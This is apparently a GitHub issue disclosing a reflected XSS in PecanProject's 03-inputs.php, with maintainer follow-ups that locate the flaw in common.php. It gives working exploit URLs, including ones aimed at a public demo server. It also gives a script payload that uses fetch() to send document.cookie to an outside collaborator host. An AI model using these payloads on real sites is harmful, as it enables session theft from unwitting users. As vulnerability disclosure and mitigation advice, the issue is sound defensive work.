pecan icon indicating copy to clipboard operation
pecan copied to clipboard
verified publisher icon PecanProject

Reflected XSS on 03-inputs.php file

Open TwistedKnee opened this issue 1 year ago • 3 comments

Bug Description

An unauthenticated user can access the 03-inputs.php and execute a reflected XSS on the site with the payload: "3cck">

To Reproduce

I am hosting on a fresh install through docker. To repeat the steps, go to your pecan.localhost server and paste this path:

http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj

I was also able to exploit this on your demo at:

http://pecan.ncsa.illinois.edu/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=5000000259&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezqqf2jvbenj

Further description

The vulnerability occurs when unsanitized input from the user is reflected back on the page without proper validation or escaping. This allows an attacker to inject malicious JavaScript code into the application, which will be executed in the context of the victim's browser.

Screenshots

XSS Execution at pecan.ncsa.illinois.edu image

XSS Execution on localhost: image

Source code of site with injected values: image

In addition to executing JavaScript I can also craft the XSS to steal a users cookie and their session. If I send a payload like so:

http://pecan.localhost/pecan/03-inputs.php?offline=offline&hostname=docker&modelid=99000000003&sitegroupid=1&lat=&lon=&siteid=622&sitename=3cck%22%3e%3cscript%3efetch(%27https%3a%2f%2f4v0ed43gg2vq3ckagbmyfdbpigo7cy0n.oastify.com%27%2c%20%7bmethod%3a%20%27POST%27%2cmode%3a%20%27no-cors%27%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3ezqqf2jvbenj

My payload is this in the sitename parameter:

<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

When I poll my collaborator in burp suite I get the users cookie information returned to me. image

Mitigation: HttpOnly Flag for Cookies: Ensure sensitive cookies (e.g., session IDs) are marked as HttpOnly so they cannot be accessed via JavaScript.

Content Security Policy (CSP): A properly configured CSP can help mitigate the risk of XSS attacks by restricting where scripts can be loaded from.

Input Sanitization & Output Encoding: Always sanitize user input and properly encode output to prevent malicious JavaScript from being executed in the browser.

In addition to above you can review more about XSS here: https://portswigger.net/web-security/cross-site-scripting/reflected In addition, guidance for fixing them here: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

TwistedKnee avatar Dec 15 '24 05:12 TwistedKnee

@robkooper

Sweetdevil144 avatar Dec 15 '24 05:12 Sweetdevil144

Hello @Sweetdevil144 @robkooper I wanted to double check on this as we are close to 90 days and I would like to work with you guys on this finding. Let me know if you need any more information from my side!

TwistedKnee avatar Mar 04 '25 21:03 TwistedKnee

Looking quickly, the problem is at https://github.com/PecanProject/pecan/blob/develop/web/common.php#L53 and we need to add some sanitizing code here.

robkooper avatar Mar 05 '25 01:03 robkooper